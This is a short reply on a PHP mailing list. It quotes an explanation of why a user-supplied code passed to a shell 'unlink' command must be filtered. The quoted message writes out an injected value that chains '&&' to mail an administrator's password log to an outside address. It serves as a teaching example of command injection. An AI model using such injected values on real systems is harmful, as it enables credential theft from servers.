Hi Patrick, I'm enlightened, thanks for your help. Regards, Bob. ----- Original Message ----- From: "Patrick Bierans" <[EMAIL PROTECTED]> > What if one enters the page, generates his md5-file and before he enteres > the form another prepares this own md5-file. Are you deleting every existing > file? In this case the first person will loose his md5-file. That's why you > will need a time based garbage collection. > > Let's say $code='2342864238724'. This will execute the following shell > command: > > unlink /tmp/2342864238724.semaphore > > And now somebody get's evil: Let's say $code='2342864238724.semaphore && > /usr/root/pass.log > sendmail [EMAIL PROTECTED] --subject="got_it!" > "got_it!" && echo' > > what will happen if you do not filter $code for "evil" chars? > > unlink /tmp/2342864238724.semaphore && /usr/root/pass.log > > sendmail [EMAIL PROTECTED] --subject="got_it!" && echo .semaphore > > translated: "delete a file and send me the password logfile from the admin"
Community email addresses: Post message: [email protected] Subscribe: [EMAIL PROTECTED] Unsubscribe: [EMAIL PROTECTED] List owner: [EMAIL PROTECTED] Shortcut URL to this page: http://groups.yahoo.com/group/php-list Yahoo! Groups Links <*> To visit your group on the web, go to: http://groups.yahoo.com/group/php-list/ <*> To unsubscribe from this group, send an email to: [EMAIL PROTECTED] <*> Your use of Yahoo! Groups is subject to: http://docs.yahoo.com/info/terms/
